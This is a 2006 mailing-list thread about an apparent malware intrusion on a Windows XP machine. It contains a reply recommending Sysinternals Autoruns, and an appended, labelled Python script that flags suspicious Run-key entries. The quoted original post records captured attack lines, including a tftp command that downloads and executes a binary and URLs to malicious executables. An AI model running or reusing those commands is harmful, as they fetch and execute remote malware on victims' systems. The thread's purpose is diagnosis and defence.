Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html

This is the list, in case you don't know, that windows activates when it starts, and is an easy way for malware to get itself started again when you reboot. Since this means the malware does not need to modify an existing .exe to get started, it will NOT appear on most anti-virus scans. Adaware does a better job of catching these automatically, but I find that getting to know the autoruns is a better way of combating the problem.

This has more info on your bad .exe
http://fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.html

"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"

Each of those may be listed in your autoruns.

Please DO keep us posted? I'm very interested to know what you find.

---
James.

> -----Original Message-----
> From: piclist-bounces@mit.edu [mailto:piclist-bounces@mit.edu] On Behalf Of Carey Fisher - NCS
> Sent: 2006 Oct 05, Thu 11:43
> To: Microcontroller discussion list - Public.
> Subject: [EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BAD LINKS LISTED
>
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
>
> Thanks,
> Carey
> --
> http://www.piclist.com PIC/SX FAQ & list archive
> View/change your membership options at
> http://mailman.mit.edu/mailman/listinfo/piclist
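
Added example, not part of the original messages: one way to review the Run-key autoruns mentioned in the reply, by parsing saved `reg query` output and flagging entries that start from a temp directory or use a file name quoted in this thread. The sample dump, the entry names in it and the flagging heuristics are constructed assumptions.

```python
import re

# Dump the keys first on the Windows machine, for example:
#   reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run > autoruns.txt
#   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run >> autoruns.txt

# File names quoted in this thread. The quoted report says several names are
# used, so the location check below matters more than a name match.
NAMES_FROM_THREAD = ("wfudpgemr", "dhayzlaukx")

# One value line of `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")

def parse_reg_query(text):
    """Yield (key, value_name, data) for each value in `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := VALUE_LINE.match(line)):
            yield key, m["name"], m["data"]

def reasons(data):
    """Why an autorun command line deserves a manual look (assumed heuristics)."""
    cmd = data.lower()
    found = []
    if "%temp%" in cmd or "\\temp\\" in cmd:
        found.append("runs from a temp directory")
    if any(name in cmd for name in NAMES_FROM_THREAD):
        found.append("file name quoted in this thread")
    return found

def review(text):
    """Return [(key, name, data, reasons)] for entries with at least one reason."""
    return [(k, n, d, r) for k, n, d in parse_reg_query(text) if (r := reasons(d))]

# Constructed sample, shaped like saved `reg query` output (not from a real machine).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VNC Server    REG_SZ    "C:\Program Files\VNC\winvnc.exe" -servicehelper
    wfud    REG_SZ    C:\WINDOWS\SYSTEM32\WFUDPGEMR1234.EXE

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    updater    REG_EXPAND_SZ    %TEMP%\DHAYZLAUKX.EXE
"""

if __name__ == "__main__":
    for key, name, data, why in review(SAMPLE):
        print(f"{key} :: {name} -> {data}  [{'; '.join(why)}]")
```

Run keys are only part of what Autoruns lists (services, scheduled tasks and the Startup folder are others), so an empty result here does not clear the machine.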